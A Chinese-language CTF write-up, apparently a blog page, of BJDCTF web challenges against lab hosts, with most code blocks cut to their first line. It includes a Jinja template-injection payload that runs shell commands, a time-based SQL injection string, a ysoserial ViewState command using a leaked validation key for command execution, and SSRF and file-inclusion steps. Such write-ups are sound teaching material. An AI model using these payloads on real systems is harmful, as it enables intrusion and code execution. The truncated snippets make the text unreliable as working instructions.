BJDCTF
web
fake google
1 | {{%27%27.__class__.__mro__[1].__subclasses__()[-13].__init__.__globals__.__builtins__.eval(%27__import__("os").popen("find%20/%20-name%20*flag*").read()%27)}} |
old_hack
1 | POST /?s=captcha HTTP/1.1 |
duangShell
1 | <!DOCTYPE html> |
简单注入
1 | username=a\&password=/if(1,sleep(5),1)%23 |
过滤:=,',;
1 | import requests |
Schrödinger
更改cookie拿到密码
av11664517@1583985203.
https://www.bilibili.com/video/av11664517
BJD{Quantum_Mechanics_really_Ez}
asp
https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/
1 | http://ff9359c1-85b4-4f2a-a1ad-31c1e40f186d.node3.buuoj.cn//ImgLoad.aspx?path=5.gif |
1 | <?xml version="1.0" encoding="UTF-8"?> |
validationKey泄露,利用viewstatas来任意命令执行
1 | ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9" |
套猪
登陆后找到一个提示
L0g1n.php
经过输入一系列http头后拿到flag
1 | GET /L0g1n.php HTTP/1.1 |
elementmaster
1 | import requests |
And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php
xss
sb题目
index.php
1 |
|
文件探测
http头中找到hint:home.php
1 | http://3801f870-f245-47ef-8325-1e117f384eb8.node3.buuoj.cn/home.php?file=system |
尝试文件包含,拿到源码
1 |
|
home.php
1 |
|
我们看到:
1 | $filter1 = '/^http:\/\/127\.0\.0\.1\//i'; |
我们利用$method
来转义%d
,在$url
中加个%s
就可以查看ssrf的内容了
扫描目录发现:admin.php,但是要从内网访问
ssrf访问得到
1 | 0 |
我们发现如果我们带decrypt参数直接访问,就不会生成secret了,那么$cipher = aesEn('', 'y1ng');